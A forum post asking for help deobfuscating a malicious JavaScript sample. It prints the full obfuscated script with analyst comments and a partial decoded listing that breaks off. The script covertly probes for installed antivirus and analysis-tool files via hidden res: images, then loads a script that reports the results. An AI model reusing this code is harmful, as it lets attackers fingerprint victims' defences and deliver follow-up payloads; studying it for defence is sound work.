我在一段JavaScript中发现了某种恶意代码。由于它经过混淆而且相当长，我想征求一些自动去混淆的思路——逐行手工还原要花很多时间……
抱歉贴了这么长的代码，我目前还看不出它在做什么……
<script>
// Global state of the sample. raelpit collects the hidden <img> probe elements
// created by nrimsm(); datmpeb is a run-once guard read by stwsiis().
// zfpamzl, cndelds, tclnil, tctidehr and ucaeggs are assigned here and never
// read anywhere in this listing (decoy declarations, presumably padding).
var raelpit = [],
zfpamzl = 0,
cndelds = 0,
tclnil = 0,
tctidehr = 0,
ucaeggs = 0,
datmpeb = false,
esrent =
// Every string literal in this sample is obfuscated the same way: a junk
// string, a character-class regex that strips the junk characters, then
// substr(start, len) picks the payload out of what remains. Here the length is
// 0, so esrent starts out as "" (it is reassigned further down).
"yotnRrwCp tHXRzIKDmqcnoXkelPfOuAtCQ jpFreviqesaOhUe ZJbVLdMq"
.replace(
/[wDLOCHMXqARZJmPjUFVkKIuQ]/g,
"").substr(20, 0);
// Prepends (ldrefdu + 2) to the global string hntpeeed: replace(/^/, x)
// inserts x at position 0. ldrefdu is a string at the only call site
// (pbpiakd(dfrrtgrn) below), so "+ 2" appends the character "2" rather than
// adding — the decoded directory name ends in "...3" and becomes "...32".
function pbpiakd(ldrefdu) {
hntpeeed = hntpeeed.replace(/^/,
ldrefdu + 2);
}
// Issues one file-existence probe for the path in rhteayms: creates a hidden
// <img>, points its src at <scheme>://<path>/#<n>/#1 where <scheme> is the
// global iyslenda (assembled by the 1 ms timer below), keeps the element in
// raelpit so stwsiis() can inspect it later, and inserts it at the top of
// <body>. Whether the image "loads" leaks whether the local file exists.
// Caveat: oerriik is never declared in this listing, so `oerriik << 4` throws
// a ReferenceError on the first call unless the hosting page defines it.
function nrimsm(rhteayms) {
var uohsev;
// decodes to 'img'
uohsev = document.createElement(
'MsAPTuostrDIYkIXuCN dlTyOWYIhhoqkiaBQZrLcHPZlimcAfgskdzfyiteTWklYsoYiJaMgdgKnMksr'
.replace(
/[WzfkHCAcyKZJOIQTPLMqYNtDBX]/g,
'').substr(16, 3));
// decodes to 'none' — the probe is invisible to the user
uohsev.style.display =
'rsfcTkqhgWpJHebtTtyZeTuicXUelnnn hkCQZznoZNWOHMneoocNaWJsmQTe'
.replace(
/[CHhyWZXpckbaNQrUgTiMJqzO]/g,
'').substr(13, 4);
// vneltoas is an implicit global; oerriik is undefined here (see above)
vneltoas = oerriik << 4;
// The three decoded fragments are '/#', '/' and '_1' (see the deobfuscated
// listing further down this page), giving <path>/#<n>/_1.
vneltoas = rhteayms +
'caeFzeFnpVimjoFzmlzFteibaRAjNhTBg ecyrZIVeiOj/#lsoFLlyokLCiSPA mArznfxiqeRMe'
.replace(
/[PIVLyRMBjNOzTSqAakZxFmC]/g,
'').substr(20, 2) +
vneltoas +
'WtmhqoltvUesTyLfl SwEYxYIVprgkaYnLpUeuGtUvwsAeaLCFPwIz/IfiNZsuJmMioSXc yfsiKGinAIYljNpWnAbJzh'
.replace(
/[LjXTZqIzENCMFuaUySvkGKPAxYJWwV]/g,
'').substr(20, 1) +
'iZBsjedZhkJzLAptzAyi qiqhkleTcUjzJRQoMNreS aX_B1JvArVioCxsi DOQjxMfSDhmeeUiRbntXhqgN sNsufmcmnbLoB'
.replace(
/[AqLOxXzTDmjVZMJkCbNhRfBUQS]/g,
'').substr(18, 2);
// Stashes the probed path on the element under a junk 7-character property
// name; nothing in this listing reads it back.
uohsev[
'HeghFqeURMdteeYTV GOkJermrnwoee uZOMiOBeGkUucTqtpyGKfOjExTyLXvIzlVbGTaIJLrBflPeEdRD qfUUhqxnosSUiFl'
.replace(
/[bKxSFILVmYfHDoGkuUXORMTEJBqZP]/g,
'').substr(20, 7)] =
rhteayms;
// replaces '_' with '#', so the suffix ends up as /#<n>/#1
vneltoas = vneltoas.replace(
'AmKkUBncPWPehsxlBbeKIQ_aETpiOBPzZeJUrQRtM vnCdrGICeeFOuxu'
.replace(
/[CAIBUZhJTmFPKQWtMxGRsEO]/g,
'').substr(7, 1),
' tkusnpia#hLHdrlBaDBbaZfrLjnA'
.replace(
/[kZBDH hrjdLpAs]/g,
'').substr(5, 1));
raelpit.push(uohsev);
// Decodes to uohsev['setAttribute']('src', ...). The URL prefix is taken from
// the page's own location: href.substr(1, 6) is "ttp://" for an http: page,
// and its "ttp" (the decoded literal below) is replaced by iyslenda — so the
// src is iyslenda + "://" + vneltoas and nothing of the page URL remains.
// `this` is the receiver-less call's global object (window) in sloppy mode.
uohsev[
'sJLewiXIBprUqPLnHekrBstSurHhlQBdVufZv rREQLrRezKnNsslwetNAkkttnhjribuEMBterivimZgaoRrqSc'
.replace(
/[PUvlSkRIEpHMjfKBwhZVLqnXQJN]/g,
'').substr(18, 12)]
(
'wsNVNaiUOgRORrQrf rXgaTBPqnirjwsrbcatTiWutkeCDqOHGmLZDTYdxTf pxJRAGEladyaeqoQGGhtza'
.replace(
/[CHkJZxzRdDOAQVWNPjqBwUTXGLEbY]/g,
'').substr(14, 3),
this.location.href.substr(
1, 6).replace(
'EBVIgnQsjiTmStcwYWKYhtSUpWsobeaIeyOlcrj CiPOfOrilWZPF'
.replace(
/[KZQcUIVyETCOBWPjYfSFhw]/g,
'').substr(5, 3),
iyslenda) +
vneltoas);
// Insert as the first child of <body> so the request fires immediately.
var vlldlsy = document.body;
vlldlsy.insertBefore(uohsev,
vlldlsy.firstChild);
}
// esrent becomes a single character used as the path separator between the
// decoded path fragments. As rendered on this page the escape "\c" collapses
// to "c"; in the real sample this is presumably a backslash whose escaping was
// lost in transcription — TODO confirm against the original file.
esrent =
"uglGMVWkcnmEHV vp\cChrIFUSGOSVfregScNwSM bAKlKue"
.replace(
/[HCENWvMOwKImGrFUSAbpV]/g,
"").substr(7, 1);
// dfrrtgrn = <10-char fragment> + esrent + <2-char fragment>; together with
// the "stem" + 3 appended below and the "2" added by pbpiakd() this evidently
// spells the Windows system directory (C:\Windows\System32) that prefixes
// the driver probes.
var dfrrtgrn =
"GdBmpjlcQrLqZgKPsPo qWLliuhzgYQsGYaCVkx:\wBIndOwJjTbsrrezAtDRFEhrblLkieBFJXYno"
.replace(
/[QXGAxVDkgTEFzWRbZKuLBYhPJjq]/g,
"").substr(13, 10) + esrent +
"OeHmNoCfgaaORtvHUtnqiLMPtsYseVPwyasBTLgrit oqSbnNrcsKrOvlUdXayTEpVn"
.replace(
/[KMVLSlTUEHBpPOXRmvbfqnNC]/g,
"").substr(9, 2);
// Probes the same relative path under both program-files directories: the two
// decoded prefixes are "C:\Program Files" and "C:\Program Files (x86)" (the
// "(x86)" is still visible inside the second junk string). Each call goes
// through nrimsm(), so two hidden <img> probes are created per path.
function rreiqsfd(rhteayms) {
nrimsm(
"wInZGsoyejan hsadzqruTRj WJCKR:\PIKIrvoSLgGrUMamU VkAYZRFSGiklRBBetsqt\abDDbsZfiascNuBksSvx qUArMnplXr"
.replace(
/[DUbzSGwRWvtIMfkYAxjTqVLZXJByNK]/g,
"").substr(14, 17) +
rhteayms);
nrimsm(
"cYmdXopBKsSKeezasOIDsyuhqOiCHZX:\PLNjDEBrvZogurkzfWBEamSDJyS MHyFBKilIes hE(x8MzA6AzI)M\aBdXksfQanytWGI"
.replace(
/[KEQNMYuZHvqyWfOzJGhDjSkXBLIA]/g,
"").substr(12, 23) +
rhteayms);
}
// Appends a 4-character fragment ("stem") and the number 3; because dfrrtgrn
// is already a string, "+ 3" concatenates the character "3".
dfrrtgrn +=
"pjmbLrdOEdheitHINsrioxRUk CsuAtqbYemlXMxYeplhYnle"
.replace(
/[CjAXxIOYqEuMrbpkHLNUR]/g,
"").substr(11, 4) + 3;
// 7-character directory name under the system directory ("drivers" in the
// deobfuscated listing); esrent is wrapped around it below.
var hntpeeed =
"JisokTdXKOrYtObbprIdNrigveAhrskzbgUKRUErYcdRGTer TZVdfQVDEuYtLluuQie AWTgfYPL"
.replace(
/[ZTQNPKfkRWEJDVLYGgzOIUhXA]/g,
"").substr(10, 7);
// Seed of the URL scheme used for the probes: a single character ('e' in the
// deobfuscated listing). The 1 ms timer below grows it to three characters.
var iyslenda =
'tMUfiLBsqrRiskzPZFtAUdkve zANdxXSExbCskaCmesGfrpnjocwWeTUdPgEdtlh kGsItTuTikCUCLYSKpJ'
.replace(
/[UJIZEzCRhANfGqPLSlWjTBFKMxYvXwk]/g,
'').substr(15, 1);
// Self-rearming 1 ms timer that assembles the probe scheme in iyslenda one
// character at a time, randomly prepending one decoded character (20 %) or
// appending another (80 %), then collapsing runs of a repeated character with
// the regex, and re-arming via arguments.callee while the string is shorter
// than 3. With the seed 'e' and the fragments 'r' / 's' from the deobfuscated
// listing the only 3-character fixed point is "res" — i.e. the probes use the
// res: URL scheme. The regex reads /(.)1+/ as rendered here; the intended
// back-reference \1 has presumably lost its backslash in transcription.
// The randomness only delays the result; it does not change it.
setTimeout(function() {
if (Math.random() < 0.2) {
iyslenda =
'JMeUoJjMimLQfqnHiYit rLbGjntearMrNHeGQhMnqgasi epdlSnUtc'
.replace(
/[QHYLqSlUfGJjgdNM]/g,
'').substr(
9, 1) +
iyslenda;
} else {
iyslenda +=
"LgDfrBhINPUDxRqtDuQW dtuiEpxwAbPFnc szPScmMSsVYVkseOWlGSPc MKPOatQrUxtVCrJn ioz"
.replace(
/[KEcVLFzIAPbfJGxMWUDYQSRBCNO]/g,
"").substr(
15, 1);
}
// replacement decodes to '$1' (keeps one copy of the repeated character)
iyslenda = iyslenda.replace(
/(.)1+/g,
'iJWiiyFNmaBdeOflqpw UOLelgkZ$1OstRWqJeehXxsdsNvukJAiPfesrXnVocb '
.replace(
/[FVvORLwBAXPUdJNpmoqZukWhx]/g,
'').substr(
12, 2));
if (iyslenda.length < 3)
setTimeout(
arguments.callee,
1)
}, 1);
// Wrap the driver directory name in separators, then let pbpiakd() prepend
// the system directory (dfrrtgrn + "2"); hntpeeed is the prefix for all of
// the *.sys probes in the main timer below.
hntpeeed += esrent;
hntpeeed = esrent + hntpeeed;
pbpiakd(dfrrtgrn);
// Main stage, 1.5 s after load: fires one nrimsm() probe per path listed
// here, then schedules stwsiis() 1 s later to read the results. Every
// argument is an obfuscated file path of a security product or analysis tool
// (the plaintext of each path is given in the deobfuscated listing further
// down this page): driver files under hntpeeed, then program files through
// rreiqsfd(), with siatsii and sosvaki as shared vendor-directory prefixes.
// Defender's note: this is an installed-AV/tooling fingerprint; what the
// server does with the reported indices is outside this listing.
// The extra { } around the body is a no-op block.
setTimeout(function() {
{
nrimsm(hntpeeed +
"orxWLtneaQaChpIJh.sJWyFsdLKLRuTbHYAzrRlqDsurZJDcze GDTJMONmHOi"
.replace(
/[KzcRMZJYNAmHqlxTLFObDhWGQ]/g,
"").substr(
6, 8));
// this one carries no hntpeeed prefix (a bare driver file name)
nrimsm(
"pVJezLroei rLxJDYzlndjSRuiPyMQXFlUHpcBCvVU.sjyAKWsiouTeZzZeHcIfjvLMBeTSqKw jemhwLatiegh PfOchy"
.replace(
/[wIHADJgTROSqzWvZKdBYLPMCxUVhj]/g,
"").substr(
11, 12)
);
nrimsm(hntpeeed +
"OCTrGtWaSndSdZLdfyisATshiCmwwbIaCffm.fGsysiOjEKBzAioeWwnuEoJFgVcptYhaUUSJanSuvlvvkRXo fsaB"
.replace(
/[FTZSvlLVwfgBACRJKjWIGOYXzEUr]/g,
"").substr(
12, 8));
nrimsm(hntpeeed +
"urnOXsTzagkVXL aDpcxVNCnMBVlhAMLTSwOiEssAxrmy.syUsnGsaoKFYbaILOro eUriyJvLUJpOXFaRDOVcsqLUfeWqJ KNKbtjNezs"
.replace(
/[qLGNExfoICURXKDTFWJYhVzOtelj]/g,
"").substr(
12, 17)
);
nrimsm(hntpeeed +
"evtshelSmAVlKQrsJF tVZsDyNNErmwNacRC.sINqylsWWrfAaBehugZtce oFnmoPiSWiIDQibZaCXC bsnLZY"
.replace(
/[CLFKhQWBJNlvXIRqDYbVZAPStE]/g,
"").substr(
10, 8));
nrimsm(hntpeeed +
"IziejYsNxTJnurXNSrqWMazfRNFnmdbJIRJamgxcUqdqhSamQVekleon.sAyWvHsbeUtrOwuQ"
.replace(
/[VdwkXFWOTvSNgzJQMRIqjxUYAH]/g,
"").substr(
10, 17)
);
// program-files probes (each rreiqsfd() call creates two <img> elements)
rreiqsfd(
"QOTpRciqsTeNMPUalwkafOPTZOvLNrZSePqqbWyDtes AUKNPntiKXF-gEXKYxYpjOfVPloiZtI\mPqVGbkae.eBxQeFVjtSgCeQbhHZRuVdrKOdvaTHai QJkLlcSGSppSeunuK"
.replace(
/[HYkVqfJjLQIRPhNXBKWOdSCvGDUTFZg]/g,
"").substr(
5, 34));
rreiqsfd(
"PncGhsrCSzBFuGQGTmGjUfssgEMalwQLGareKbYytesT LAnJWLti-MLfCfuaVflfTEwaYrSIe\mNXufNObzSaXm.exLGDueipivOJGBPuzoBkIpsZWzqlDFCssobBuhFddODiD"
.replace(
/[EJKSuYkjzGBfTdDWZFQNVPqUvOLCIX]/g,
"").substr(
9, 34));
rreiqsfd(
"OyDXtDBWeNnFOFacsCp epiXcvKqAVAGYFSGET SELoNfqBFtwWaPmKyrueW\AJLqBPvaust\AYvaYyDuDqEsztUKWzIORQzHW.exmeaKXebebQheOhblodBeYX BkcegzRGPPaBlZctroWelsc jHLWF"
.replace(
/[zWRhOLXFBqdQGHbPmCJDEjZuKNycY]/g,
"").substr(
11, 32)
);
rreiqsfd(
"PiFErtvVQSDPwbtDW MurukCsOsHhIzUPnnortoFxnRMDCz ZJsAVeLNEcOvXuMjjriVty\BRrWhanDdiInIOGgqPpN\mWVjuijs.dRkLjlAPxlotWQallRDa"
.replace(
/[jGZRJCWLEFQUVHSpNPDMkqOxhIAXvz]/g,
"").substr(
13, 33)
);
rreiqsfd(
"dUWNCrZaijoqh OUaUgiqifnOIWoQDrtqEowJOHn inQtAPerneSt sReAVLwxYcXkDIKurQiqYtpyOLAqW\BranLVTdipbXCngA\mwONuipbxbsDMK.LNHZbdQlltDcNDDHaDazbDd wxRIb"
.replace(
/[OIkqSXDMCEZbPNWVYAjwTJKQpLHRxU]/g,
"").substr(
12, 42)
);
rreiqsfd(
"eZamUyaDIegnLtdYc JjNhVeDvepyolYDlMtQZFPY-SeQcHuPrqeBA\tbNYWyMXrjRXBhiAVkUjBggXEekGHrL.IezGxNeuyaJMgvaztiuHJG nRhcfKDThCEyejMuINIRePRDCtoaI"
.replace(
/[ZQhfBCJyTWRLPDMIqbKAHGYEjUXVNkz]/g,
"").substr(
19, 20)
);
nrimsm(hntpeeed +
"yBDrkagpVPdVAeiSeCx xWpZAitsuvkYsBjtz lmqZwOchrzqSXPfswNvbDROXtas.sJysHHlYsBDsnnDaHoA"
.replace(
/[WvRjacwkVmxzNHJXPOBACZDYSq]/g,
"").substr(
20, 9));
// siatsii: shared vendor prefix for the next four probes
var siatsii =
"eycsAPNjFjuQyewJ oaaGprOhoVmYUKUaZspRVermDsXZkNINhPTy DHLAgCab\KhPNDQFaFjPspqerOskdy lDMpAqqziHnuHNiiQI "
.replace(
/[hRMIHUdZYJODQVNFCXqGPjgcTmA]/g,
"").substr(
14, 24);
rreiqsfd(siatsii +
"rsqhcagAdeHXToBRtalX kwEIMzSweKggcuYQrNONPRiLJtyQC G15WGZUC.0.G2\aIZQVvpORuWXGiM.QejxYeXfpnBRMAboOkgpA aIVPqxCjmsmb"
.replace(
/[qLUYPRXBzHNWEQgKIGkMCwJmOjZAV]/g,
"").substr(
7, 31));
rreiqsfd(siatsii +
"XJsQPhmPwglzdj CTrjsLQDaEzzegnuZNEZKIntLerqnetzEFFY SCeAcXuhYLAErWiAtRy ff15P.0.2QqYq\aOAvVOJGpuEUZi.exePmTzUahksMbDAoZEMjAD"
.replace(
/[EXCJWTZqUMKYONFzjQbhVGPARfLD]/g,
"").substr(
14, 34)
);
rreiqsfd(siatsii +
"eilaOJsMshOQJcOGkYrTFKTf mRtzSAyEntRiS-VhwiruIYRhZs 1U5FMT.S0lM.2\aGFqPvpwEuMiyRWE.ZeTBNXxESespWPQRehiuecXYipdsqW jpUSHRQTWFsXfDbvqBgLQh BoC"
.replace(
/[UGJMRPXLESzjqDCZlIHKNBFOWwYyTQh]/g,
"").substr(
12, 27)
);
rreiqsfd(siatsii +
"TFNeUZLLJTeejikMQJCtMYbjSmYLHNallj qIOVGfficeAhG SDQecuAEUQQhrYBAityJ UWLBXh3\sTNVtajrtCXWegrQQT_YATavp.WexEezErtCTWioDAWwwlgVKaern"
.replace(
/[ZJVAITDFHBhCGgEWMUQLKYwqNXj]/g,
"").substr(
7, 39));
nrimsm(hntpeeed +
"dOHpXcJRnOYHPNRzRKaLTemFLWTPjKsDeynIxWqXzPCTb ueiLuFoxoZPIFMrLdRSYriverLjskSRbYfilMHtUzOerMGwKw.QOsZHxyxsnyhrIngUaTQa ssehRuJLXCSUMEdoZ rog"
.replace(
/[PSKOxEXRLFDYWQMmCjGTHJqUZNwIz]/g,
"").substr(
19, 19)
);
// sosvaki: shared vendor prefix for the next seven probes
var sosvaki =
"tSRlRKmwYaGmVpizjn SOXzKhheiaKQGeoFbTrehSVqKZnd MChSiCSPycro\gQrEeaVDIBrOXiqsWexm USaxHeQnVihenmwouZqo"
.replace(
/[WHqbEPhVKYCFUZIwRODQmXxBjGSyz]/g,
"").substr(
12, 12);
rreiqsfd(sosvaki +
"inEPmtLGLBmtqVltyZTYOLDiAdtaVnyViSum\UIXEVFramHPeJhwHQHojyrkySZABdhYXXL\uYiWPiNdnKECORShVMgBREErh.OXeKqRxeqYcaHYfbt slJZwDGhScdtteiKvSleifsrG"
.replace(
/[SYARBE JqOPyHNVZGLdDKhjCQX]/g,
"").substr(
8, 33));
rreiqsfd(sosvaki +
"QiHGJNGWssaEAJQeyYBjpq tiZhyKKZlrXYAGTyQGWMjIEWDyOSkQ\PrwzmUCVvonsLole.ezxefbGWuQtXNKQbrbnnzcLvnfdmosL"
.replace(
/[QYvJEHUfNKALjyGOzXVkrBWZc]/g,
"").substr(
12, 20)
);
rreiqsfd(sosvaki +
"HsFHrzBlLbgwiiluja rzzgRjishYSecZTFOuZTVHQriYXUzfty AHqDKqgZLentG\PWFvCCDNXFWRtMovnXTmTf.RexJGeOqdJBQUZEepsXUvkqaXm"
.replace(
/[HWvGXmVUfKOQpYJFERBLqDzZTj]/g,
"").substr(
17, 27)
);
rreiqsfd(sosvaki +
"KnDkrpOebleeOEvWOXsGsCzzFlqieRWGbJnBtQE zSerZFQvUIJerd FSUBwOechurityLV VVjAhgeUqDVFHhbnKtR\PJKzRBXJZEcJcINFYTMoGnLRWJ.eUxFeUGFltstWYJseribijIGLK lpaYXqpmibvkOiifoWhrDE"
.replace(
/[XWRHEjGZwLJqKQzhBOdUVDpYbkIF]/g,
"").substr(
9, 41));
rreiqsfd(sosvaki +
"ignQsUjQOKmHt UEpQoqrYaEqFOljarUFsDZZ TDGLmtziTDfBFHrDSJeqNcDFFuYqHrqEBKiGtHyD SWUerLvFerG\PYJCCWGLDZSRQVZ\AGIQpaUcQhDeN2\bKinY\AGQzQJKYBpLGaXchDeMjJoqINnlOiQDtZoBrOOQ.FeZxeDlwjtyDTaOBGFqZtFFTHDntXXOiDcdYFnLUzIlnGgB kT"
.replace(
/[YUKHJOBDjqLWETQGzNZXIlF]/g,
"").substr(
20, 52)
);
rreiqsfd(sosvaki +
"oaoafntKtrBhphYWrPjTvHobCAKwsCPerE GuWYMardcF\BKbPgVZfZVGUif.FePAxeanHsydEKLTdnqlPidjPTzhNhLmZ"
.replace(
/[jchAgYEHVWCNbZvPzKfMLpTFq]/g,
"").substr(
8, 22));
// remaining probes target analysis/network tooling rather than AV products
rreiqsfd(
"ubaoTszEwVuQCe MlcNAfWwNee.Tcomq\AjWJzygZSednzYWRFt\mIQbcaWgentLN.exLyeRxQrtpInnSU riETr"
.replace(
/[qzVERZYNwljIWSLdbCFJQyUT]/g,
"").substr(
7, 28));
rreiqsfd(
"DdecrRoidW ishmHCPJwciVt eRcAreIFYkifAddmokolYoKSekXLrfIRYB2U\FPARLUYSKjOMiGjEqKddAlEXGPjerI.GDDexjeerAqteansmNJGNM KReLIesgphJrWurvAO"
.replace(
/[OHPCjYMESfBKqWJVwXARoIkDLmGUN]/g,
"").substr(
18, 20)
);
rreiqsfd(
"PSQuUIsaDwhHrRfBtJfruySsUWoFhPiddlWJer4JMAQP\FATVidUJdler.BEBjVexEejKsnSuetnek REKl"
.replace(
/[BPSUwREVJfHIDyKQAhTjWM]/g,
"").substr(
9, 20));
rreiqsfd(
"rWmflwWhzjwiiei atYrvscjXDgaAQiQr WoYRXTzKDWnlOERwZpmqenVPLMwKoNQoo\UmWoEHnginJGswtazlWl.DoYJMCJexecGfrAGGSdEibpncsGnHeTGGBrm RugeYMuq"
.replace(
/[fZRoGSLTXCgqYmKWMJjQBEwAzHD]/g,
"").substr(
20, 21)
);
rreiqsfd(
"qHiKwzkKtsrnuifawSPymODZanZteFYGc\LKivqJhhIeUApwEdDPTDafte\MOHwKSVACRWKKhO71F.dllNNBatkEQAkQFeFaaDoW bGZOcqIFxulEHgj"
.replace(
/[TjIwWDkNGrKFAhPqfYJOHZQzEB]/g,
"").substr(
7, 31));
rreiqsfd(
"VBndqwbqGfbqUgICoLQQjDKkRuIOOBLmmon PFilXzTejs\SGykTmanJJteNc ShareBudLRZOPII\ckcEvPXVtMjgr.ewxeNGUtiuBNcTbauTmXaog piQQetniAI"
.replace(
/[QwjTkABLPZDRVGzJfNKUIXuOq]/g,
"").substr(
5, 41));
}
// give the probes a second to settle, then collect and report
setTimeout(stwsiis,
1000);
}, 1500);
// Collection stage: walks the probe elements in raelpit, marks each one as
// "found" unless its decoded property (fileUpdatedDate, an IE-only element
// property) reads as the empty string, and reports the indices of the found
// probes — i.e. which of the paths above exist on the victim's machine — by
// inserting a <script> whose src is "jlvx.htm?<random>,<i1>,<i2>,...". The
// browser then fetches that URL (carrying the fingerprint as its query
// string) and executes whatever it returns. datmpeb makes this run once.
// Detection hint: a burst of hidden <img> loads with a non-http scheme
// pointing at local program paths, followed by a script request with a
// comma-separated index list, is the observable signature of this stage.
function stwsiis() {
if (datmpeb) return;
datmpeb = true;
// ctstahjh: the comma-separated index list, starts as "" (substr length 0);
// ildciea: running index into raelpit.
var ctstahjh =
"liXksvXsyWoruOMnFzXOmtpTEXikAxfteZ"
.replace(
/[TvpXAWxOZMzEkyF]/g,
"").substr(6, 0),
ildciea = 0;
// for...in over an array: iterates index keys (and any enumerable
// properties added to Array.prototype by other scripts on the page).
for (var i in raelpit) {
var found = false;
try {
// decoded property name: 'fileUpdatedDate'; compared (loosely) with ""
if (raelpit[i][
'cShtxvaLencnaoatQtL FfrKfXQwilLCeUpSwdatedDkaRwtmrVeHtuezJtesmB'
.replace(
/[KrzCkRLSBJFvuXQHmnchxwVo]/g,
'').substr(
9, 15)
] ==
"zmsXeRLNnyaWsqXBFXxiyebgrPzhtmEIeYdBneTsiBqtfaPcv ZqksmonDwKuE"
.replace(
/[xKYyqPWXzNoEBDTgFbLZifIR]/g,
"").substr(11,
0)) found =
false;
else found = true;
} catch (e) {
// any exception while reading the property also counts as "found"
found = true;
}
// `found > 0` coerces the boolean: true > 0 is true. Appends "<index>,".
if (found > 0) ctstahjh +=
ildciea +
'LliwOoCNpsBcSinerBMeb qhzUJeGu,ySOsqgTZNWMgQXEyDvjeTUi '
.replace(
/[qOSGNWjUEsXlLQwDTCBJpZMz]/g,
'').substr(13, 1);
ildciea++;
}
// document['createElement']('sc' + 'ript')
var nlmata = document[
'RYsegzNnKntFa gpdocrptGsWehcJINqPrJAKeatyTCMGOevFOhEYleVMmentuKfmOaHqRrphOzVDr'
.replace(
/[GONFJDVgKqAzvpydhRCHWPMITY]/g,
'').substr(13, 13)]
(
'eLzSdbgaMunpJDvV VlfHXIyGqdnWGoaBzBpssI ktEscFRXHHeOHiDrGyCwGPWleJmoyeHIWsFblhpIsi'
.replace(
/[MGDEBILypHvbSJOCzRXoPVWF]/g,
'').substr(18, 2) +
'PpvyPtrwSiFyhRLxraviptngIqmwteslKlkF LbMOkCsjVWGztMoVur'
.replace(
/[jwKbSMFgWvPOCGaqzImxVRsLh]/g,
'').substr(6, 4));
// nlmata['src'] = 'jlvx.htm?' + Math.random() + ',' + ctstahjh
// The random value is a cache-buster; the relative URL resolves against the
// hosting page's origin.
nlmata[
'MBdQDhogneFIrnWlAPJWjpsDx mpvqBcXxiiGfBhYuJOKshUrcrCLyilQxbdlFee'
.replace(
/[WhgQFKJBLYGMfDOXCxPUqjAIo]/g,
'').substr(16, 3)] =
'mViEuZlOFaEZqtuKnCUqwnCKjlovxLr.htpm?equksWfPkcDd'
.replace(
/[aFCpZqKdLVDwOrPUoEWk]/g,
'').substr(8, 9) + Math
.random() +
'MXiZAQHnTfnkcAjpau,LrKsxxtezwDFsfbdeX EusNeEnKVIslTBgPCm'
.replace(
/[EHCBMIPZufDXAQxLFKbrTdNjtkV]/g,
'').substr(6, 1) +
ctstahjh;
var yilwre = document.body;
yilwre.insertBefore(nlmata,yilwre.firstChild);
}
</script>
我曾把传给 setTimeout 的函数赋给一个变量，再用 debug(this_variable); this_variable(); 来观察它的行为，但帮助不大。
我认为有几种方法可以处理这个问题，但第一步肯定是先把它解码。把解码结果贴在这里我并不觉得有什么不妥，因为它本身无法独立运行（至少有一个变量没有定义）。希望这能帮你省些功夫 =)
// Decoded globals. raelpit holds the hidden <img> probes created by nrimsm();
// datmpeb is the run-once flag for stwsiis(). The five numeric variables are
// never read anywhere in the sample (decoys). esrent is the path separator;
// it decodes to '' here only because the backslashes were lost when the
// sample was pasted — presumably it was a single backslash.
var raelpit = [],
zfpamzl = 0,
cndelds = 0,
tclnil = 0,
tctidehr = 0,
ucaeggs = 0,
datmpeb = false,
esrent = '';
// Prepends ldrefdu + "2" to the global hntpeeed (ldrefdu is a string at the
// only call site, so + 2 concatenates the character "2": "...System3" -> "...System32").
function pbpiakd(ldrefdu) {
hntpeeed = hntpeeed.replace(/^/, ldrefdu + 2);
}
// One file-existence probe: a hidden <img> whose src is built from the scheme
// in iyslenda and the local path in rhteayms. The element is kept in raelpit
// so stwsiis() can read its state afterwards.
function nrimsm(rhteayms) {
var uohsev = document.createElement('img');
uohsev.style.display = 'none';
// oerriik is not defined anywhere in the sample (vneltoas itself is just an
// implicit global assigned on this line), so this throws a ReferenceError
// unless the hosting page supplies oerriik =/
vneltoas = oerriik << 4;
vneltoas = rhteayms + '/#' + vneltoas + '/' + '_1';
// junk-named property that stashes the probed path on the element
uohsev['tpyjyvz'] = rhteayms;
vneltoas = vneltoas.replace('_', '#');
raelpit.push(uohsev);
// CURRENT SITE STARTS WITH HTTP?... The original takes location.href.substr(1, 6)
// — "ttp://" for an http: page — and replaces its "ttp" with iyslenda, so the
// src becomes iyslenda + '://' + vneltoas. That only holds for an http: URL;
// for ftp or anything else the substring and the replacement differ.
// NOTE(review): the line below is not quite the same as the original — the
// original keeps only those six characters, so none of the page URL
// (href.substr(7)) ends up in the probe src.
uohsev['setAttribute']('src', iyslenda + '://' + this.document.location.href.substr(7) + vneltoas);
var vlldlsy = document.body;
vlldlsy.insertBefore(uohsev, vlldlsy.firstChild);
}
// esrent: path separator (see the note on the declarations above).
esrent = "";
// In the obfuscated script this is <10 chars> + esrent + <2 chars>, i.e.
// "C:\Windows" + "\" + "Sy" (the backslashes are missing in this transcript);
// "stem" + "3" are appended below and pbpiakd() adds the trailing "2".
dfrrtgrn = "C:wIndOwssY";
// Probes the same relative path under both program-files directories (two
// hidden <img> elements per call). A separator between the prefix and
// rhteayms is missing in this transcript, as are the ones in the prefixes.
function rreiqsfd(rhteayms) {
nrimsm("C:Program Files" + rhteayms);
nrimsm("C:Program Files (x86)" + rhteayms);
}
// In the original only "stem" + 3 is appended here (dfrrtgrn is a string, so
// the 3 concatenates); as written this line repeats the prefix.
dfrrtgrn += "C:wIndOwssYstem3";
// directory name under the system directory; esrent is wrapped around it below
var hntpeeed = 'drivers';
// seed of the probe URL scheme, grown to three characters by the timer below
var iyslenda = 'e';
// Self-rearming 1 ms timer that builds iyslenda: prepend 'r' (20 %) or append
// 's' (80 %), collapse repeated characters, re-arm until the length reaches 3.
// From the seed 'e' the only 3-character fixed point is "res", so the probes
// use the res: URL scheme. The regex needs \1, not 1, for the collapse to work
// (backslash lost in transcription, as with the path separators).
// NOTE(review): this transcription has a stray `}` after the else-branch that
// closes the callback early, so the replace() and the re-arm are outside the
// function and the snippet does not parse; in the original both are inside
// the callback, after the if/else.
setTimeout(function() {
if (Math.random() < 0.2) {
iyslenda = 'r' + iyslenda;
}
else {
iyslenda += 's';
}
}
iyslenda.replace(/(.)1+/g, '$1');
if (iyslenda.length < 3) {
setTimeout(arguments.callee, 1)
}
}, 1);
// Wrap the drivers directory in separators and prepend the system directory:
// hntpeeed is the prefix for every *.sys probe below.
hntpeeed += esrent;
hntpeeed = esrent + hntpeeed;
pbpiakd(dfrrtgrn);
// Main stage, 1.5 s after load: one probe per security-product or tooling
// file, then stwsiis() a second later to collect the results. The path
// separators before the file names were lost in transcription (e.g. the
// first entry is <drivers dir>\aCpI.sys, the Malwarebytes entries are
// "...Anti-Exploit\mbae.exe" and so on).
setTimeout(function() {
{
// driver files under C:\Windows\System32\drivers\ (hntpeeed)
nrimsm(hntpeeed + 'aCpI.sys');
nrimsm('iyQXFlpc.sys');
nrimsm(hntpeeed + 'mbam.sys');
nrimsm(hntpeeed + 'MBAMSwissArmy.sys');
nrimsm(hntpeeed + 'mwac.sys');
nrimsm(hntpeeed + 'mbamchameleon.sys');
// program files (each rreiqsfd() probes both Program Files directories)
rreiqsfd('Malwarebytes Anti-Exploitmbae.exe');
rreiqsfd('Malwarebytes Anti-Malwarembam.exe');
